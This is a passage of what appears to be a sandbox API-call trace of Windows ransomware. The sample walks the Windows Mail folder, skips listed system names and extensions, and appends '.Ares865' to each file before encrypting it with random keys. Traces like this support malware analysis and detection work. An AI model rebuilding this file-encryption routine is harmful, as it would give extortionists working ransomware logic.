FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0122.548] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Windows Mail\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\windows mail\\how to back your files.exe"), bFailIfExists=1) returned 0 [0122.549] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0122.549] GetLastError () returned 0x0 [0122.549] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0122.549] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0122.550] CloseHandle (hObject=0x120) returned 1 [0122.550] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0122.550] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0122.550] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Windows Mail\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd91d5ea, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5224cd80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5224cd80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0122.550] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0122.550] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0122.550] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0122.550] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd91d5ea, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5224cd80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5224cd80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.550] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0122.550] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0122.550] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0122.550] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0122.550] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x52272ee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52272ee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0122.550] lstrcmpiW (lpString1="en-US", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0122.550] lstrcmpiW (lpString1="en-US", lpString2="aoldtz.exe") returned 1 [0122.550] lstrcmpiW (lpString1="en-US", lpString2=".") returned 1 [0122.550] lstrcmpiW (lpString1="en-US", lpString2="..") returned 1 [0122.550] lstrcmpiW (lpString1="en-US", lpString2="windows") returned -1 [0122.550] lstrcmpiW (lpString1="en-US", lpString2="bootmgr") returned 1 [0122.550] lstrcmpiW (lpString1="en-US", lpString2="temp") returned -1 [0122.550] lstrcmpiW (lpString1="en-US", lpString2="pagefile.sys") returned -1 [0122.550] lstrcmpiW (lpString1="en-US", lpString2="boot") returned 1 [0122.550] lstrcmpiW (lpString1="en-US", lpString2="ids.txt") returned -1 [0122.551] lstrcmpiW (lpString1="en-US", lpString2="ntuser.dat") returned -1 [0122.551] lstrcmpiW (lpString1="en-US", lpString2="perflogs") returned -1 [0122.551] lstrcmpiW (lpString1="en-US", lpString2="MSBuild") returned -1 [0122.551] lstrlenW (lpString="en-US") returned 5 [0122.551] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Mail\\*") returned 37 [0122.551] lstrcpyW (in: lpString1=0x2cce448, lpString2="en-US" | out: lpString1="en-US") returned="en-US" [0122.551] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b48 [0122.551] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x54) returned 0x2df7d0 [0122.551] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b50 | out: ListHead=0x2e7710, ListEntry=0x2e7b50) returned 0x2e7b10 [0122.551] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5224cd80, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x5224cd80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0122.551] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0122.551] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3b530d7, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3b530d7, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3b9f397, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x18b800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="msoe.dll", cAlternateFileName="")) returned 1 [0122.551] lstrcmpiW (lpString1="msoe.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0122.551] lstrcmpiW (lpString1="msoe.dll", lpString2="aoldtz.exe") returned 1 [0122.551] lstrcmpiW (lpString1="msoe.dll", lpString2=".") returned 1 [0122.551] lstrcmpiW (lpString1="msoe.dll", lpString2="..") returned 1 [0122.551] lstrcmpiW (lpString1="msoe.dll", lpString2="windows") returned -1 [0122.551] lstrcmpiW (lpString1="msoe.dll", lpString2="bootmgr") returned 1 [0122.551] lstrcmpiW (lpString1="msoe.dll", lpString2="temp") returned -1 [0122.551] lstrcmpiW (lpString1="msoe.dll", lpString2="pagefile.sys") returned -1 [0122.551] lstrcmpiW (lpString1="msoe.dll", lpString2="boot") returned 1 [0122.551] lstrcmpiW (lpString1="msoe.dll", lpString2="ids.txt") returned 1 [0122.551] lstrcmpiW (lpString1="msoe.dll", lpString2="ntuser.dat") returned -1 [0122.551] lstrcmpiW (lpString1="msoe.dll", lpString2="perflogs") returned -1 [0122.551] lstrcmpiW (lpString1="msoe.dll", lpString2="MSBuild") returned 1 [0122.551] lstrlenW (lpString="msoe.dll") returned 8 [0122.551] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Mail\\en-US") returned 41 [0122.551] lstrcpyW (in: lpString1=0x2cce448, lpString2="msoe.dll" | out: lpString1="msoe.dll") returned="msoe.dll" [0122.551] lstrlenW (lpString="msoe.dll") returned 8 [0122.551] lstrlenW (lpString="Ares865") returned 7 [0122.551] lstrcmpiW (lpString1="soe.dll", lpString2="Ares865") returned 1 [0122.551] lstrlenW (lpString=".dll") returned 4 [0122.552] lstrcmpiW (lpString1="msoe.dll", lpString2=".dll") returned 1 [0122.552] lstrlenW (lpString=".lnk") returned 4 [0122.552] lstrcmpiW (lpString1="msoe.dll", lpString2=".lnk") returned 1 [0122.552] lstrlenW (lpString=".ini") returned 4 [0122.552] lstrcmpiW (lpString1="msoe.dll", lpString2=".ini") returned 1 [0122.552] lstrlenW (lpString=".sys") returned 4 [0122.552] lstrcmpiW (lpString1="msoe.dll", lpString2=".sys") returned 1 [0122.552] lstrlenW (lpString="msoe.dll") returned 8 [0122.552] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Mail\\msoe.dll.Ares865") returned 52 [0122.552] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Mail\\msoe.dll" (normalized: "c:\\program files (x86)\\windows mail\\msoe.dll"), lpNewFileName="C:\\Program Files (x86)\\Windows Mail\\msoe.dll.Ares865" (normalized: "c:\\program files (x86)\\windows mail\\msoe.dll.ares865"), dwFlags=0x1) returned 1 [0122.556] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Mail\\msoe.dll.Ares865" (normalized: "c:\\program files (x86)\\windows mail\\msoe.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0122.556] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1619968) returned 1 [0122.556] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0122.557] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0122.557] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0122.557] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0122.558] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0122.558] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.558] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x18bb00, lpName=0x0) returned 0x170 [0122.561] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18bb00) returned 0x3030000 [0122.649] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0122.650] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0122.650] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.650] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0122.650] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0122.651] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0122.651] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0122.651] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0122.651] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0122.651] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0122.651] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0122.651] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0122.651] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0122.651] UnmapViewOfFile (lpBaseAddress=0x3030000) returned 1 [0122.666] CloseHandle (hObject=0x170) returned 1 [0122.666] CloseHandle (hObject=0x118) returned 1 [0122.666] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0122.666] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0122.666] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0122.673] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e00b0b6, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x9e00b0b6, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x6cf87540, ftLastWriteTime.dwHighDateTime=0x1ca041f, nFileSizeHigh=0x0, nFileSizeLow=0x2b4a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOERES.dll", cAlternateFileName="")) returned 1 [0122.673] lstrcmpiW (lpString1="MSOERES.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0122.673] lstrcmpiW (lpString1="MSOERES.dll", lpString2="aoldtz.exe") returned 1 [0122.673] lstrcmpiW (lpString1="MSOERES.dll", lpString2=".") returned 1 [0122.673] lstrcmpiW (lpString1="MSOERES.dll", lpString2="..") returned 1 [0122.673] lstrcmpiW (lpString1="MSOERES.dll", lpString2="windows") returned -1 [0122.673] lstrcmpiW (lpString1="MSOERES.dll", lpString2="bootmgr") returned 1 [0122.673] lstrcmpiW (lpString1="MSOERES.dll", lpString2="temp") returned -1 [0122.673] lstrcmpiW (lpString1="MSOERES.dll", lpString2="pagefile.sys") returned -1 [0122.673] lstrcmpiW (lpString1="MSOERES.dll", lpString2="boot") returned 1 [0122.673] lstrcmpiW (lpString1="MSOERES.dll", lpString2="ids.txt") returned 1 [0122.673] lstrcmpiW (lpString1="MSOERES.dll", lpString2="ntuser.dat") returned -1 [0122.673] lstrcmpiW (lpString1="MSOERES.dll", lpString2="perflogs") returned -1 [0122.673] lstrcmpiW (lpString1="MSOERES.dll", lpString2="MSBuild") returned 1 [0122.673] lstrlenW (lpString="MSOERES.dll") returned 11 [0122.673] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Mail\\msoe.dll") returned 44 [0122.673] lstrcpyW (in: lpString1=0x2cce448, lpString2="MSOERES.dll" | out: lpString1="MSOERES.dll") returned="MSOERES.dll" [0122.673] lstrlenW (lpString="MSOERES.dll") returned 11 [0122.673] lstrlenW (lpString="Ares865") returned 7 [0122.673] lstrcmpiW (lpString1="RES.dll", lpString2="Ares865") returned 1 [0122.673] lstrlenW (lpString=".dll") returned 4 [0122.673] lstrcmpiW (lpString1="MSOERES.dll", lpString2=".dll") returned 1 [0122.673] lstrlenW (lpString=".lnk") returned 4 [0122.673] lstrcmpiW (lpString1="MSOERES.dll", lpString2=".lnk") returned 1 [0122.673] lstrlenW (lpString=".ini") returned 4 [0122.674] lstrcmpiW (lpString1="MSOERES.dll", lpString2=".ini") returned 1 [0122.674] lstrlenW (lpString=".sys") returned 4 [0122.674] lstrcmpiW (lpString1="MSOERES.dll", lpString2=".sys") returned 1 [0122.674] lstrlenW (lpString="MSOERES.dll") returned 11 [0122.675] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Mail\\MSOERES.dll.Ares865") returned 55 [0122.675] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Mail\\MSOERES.dll" (normalized: "c:\\program files (x86)\\windows mail\\msoeres.dll"), lpNewFileName="C:\\Program Files (x86)\\Windows Mail\\MSOERES.dll.Ares865" (normalized: "c:\\program files (x86)\\windows mail\\msoeres.dll.ares865"), dwFlags=0x1) returned 1 [0122.677] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Mail\\MSOERES.dll.Ares865" (normalized: "c:\\program files (x86)\\windows mail\\msoeres.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0122.677] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2836992) returned 1 [0122.677] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0122.678] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0122.678] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0122.678] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0122.679] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0122.679] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.679] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2b4d00, lpName=0x0) returned 0x170 [0122.680] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0xb4d00) returned 0xdd0000 [0122.830] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0122.830] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0122.830] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.830] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0122.830] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0122.831] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0122.831] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0122.831] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0122.831] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0122.831] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0122.831] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0122.831] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0122.831] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0122.831] UnmapViewOfFile (lpBaseAddress=0xdd0000) returned 1 [0122.838] CloseHandle (hObject=0x170) returned 1 [0122.838] CloseHandle (hObject=0x118) returned 1 [0122.838] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0122.838] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0122.838] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0122.847] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3b9f397, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3b9f397, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3b9f397, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x13e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oeimport.dll", cAlternateFileName="")) returned 1 [0122.847] lstrcmpiW (lpString1="oeimport.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0122.847] lstrcmpiW (lpString1="oeimport.dll", lpString2="aoldtz.exe") returned 1 [0122.847] lstrcmpiW (lpString1="oeimport.dll", lpString2=".") returned 1 [0122.847] lstrcmpiW (lpString1="oeimport.dll", lpString2="..") returned 1 [0122.847] lstrcmpiW (lpString1="oeimport.dll", lpString2="windows") returned -1 [0122.847] lstrcmpiW (lpString1="oeimport.dll", lpString2="bootmgr") returned 1 [0122.847] lstrcmpiW (lpString1="oeimport.dll", lpString2="temp") returned -1 [0122.847] lstrcmpiW (lpString1="oeimport.dll", lpString2="pagefile.sys") returned -1 [0122.847] lstrcmpiW (lpString1="oeimport.dll", lpString2="boot") returned 1 [0122.847] lstrcmpiW (lpString1="oeimport.dll", lpString2="ids.txt") returned 1 [0122.848] lstrcpyW (in: lpString1=0x2cce448, lpString2="oeimport.dll" | out: lpString1="oeimport.dll") returned="oeimport.dll" [0122.848] lstrlenW (lpString="oeimport.dll") returned 12 [0122.848] lstrlenW (lpString="Ares865") returned 7 [0122.848] lstrcmpiW (lpString1="ort.dll", lpString2="Ares865") returned 1 [0122.848] lstrlenW (lpString=".dll") returned 4 [0122.848] lstrcmpiW (lpString1="oeimport.dll", lpString2=".dll") returned 1 [0122.848] lstrlenW (lpString=".lnk") returned 4 [0122.848] lstrcmpiW (lpString1="oeimport.dll", lpString2=".lnk") returned 1 [0122.848] lstrlenW (lpString=".ini") returned 4 [0122.848] lstrcmpiW (lpString1="oeimport.dll", lpString2=".ini") returned 1 [0122.848] lstrlenW (lpString=".sys") returned 4 [0122.848] lstrcmpiW (lpString1="oeimport.dll", lpString2=".sys") returned 1 [0122.848] lstrlenW (lpString="oeimport.dll") returned 12 [0122.848] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Mail\\oeimport.dll.Ares865") returned 56 [0122.848] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Mail\\oeimport.dll" (normalized: "c:\\program files (x86)\\windows mail\\oeimport.dll"), lpNewFileName="C:\\Program Files (x86)\\Windows Mail\\oeimport.dll.Ares865" (normalized: "c:\\program files (x86)\\windows mail\\oeimport.dll.ares865"), dwFlags=0x1) returned 1 [0122.851] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Mail\\oeimport.dll.Ares865" (normalized: "c:\\program files (x86)\\windows mail\\oeimport.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0122.851] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=81408) returned 1 [0122.851] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0122.851] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0122.851] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0122.851] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0122.852] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0122.852] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.852] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x14100, lpName=0x0) returned 0x170 [0122.854] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14100) returned 0x190000 [0122.858] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0122.859] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0122.859] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.859] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0122.859] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0122.859] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0122.859] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0122.859] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0122.859] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0122.859] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0122.859] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0122.859] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0122.859] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0122.859] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0122.860] CloseHandle (hObject=0x170) returned 1 [0122.860] CloseHandle (hObject=0x118) returned 1 [0122.860] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0122.860] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0122.860] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0122.861] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x879b1223, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x879b1223, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x87a95a65, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x7e000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wab.exe", cAlternateFileName="")) returned 1 [0122.861] lstrcmpiW (lpString1="wab.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0122.861] lstrcmpiW (lpString1="wab.exe", lpString2="aoldtz.exe") returned 1 [0122.861] lstrcpyW (in: lpString1=0x2cce448, lpString2="wab.exe" | out: lpString1="wab.exe") returned="wab.exe" [0122.861] lstrlenW (lpString="wab.exe") returned 7 [0122.861] lstrlenW (lpString="Ares865") returned 7 [0122.861] lstrlenW (lpString=".dll") returned 4 [0122.861] lstrcmpiW (lpString1="wab.exe", lpString2=".dll") returned 1 [0122.861] lstrlenW (lpString=".lnk") returned 4 [0122.861] lstrcmpiW (lpString1="wab.exe", lpString2=".lnk") returned 1 [0122.861] lstrlenW (lpString=".ini") returned 4 [0122.861] lstrcmpiW (lpString1="wab.exe", lpString2=".ini") returned 1 [0122.862] lstrlenW (lpString=".sys") returned 4 [0122.862] lstrcmpiW (lpString1="wab.exe", lpString2=".sys") returned 1 [0122.862] lstrlenW (lpString="wab.exe") returned 7 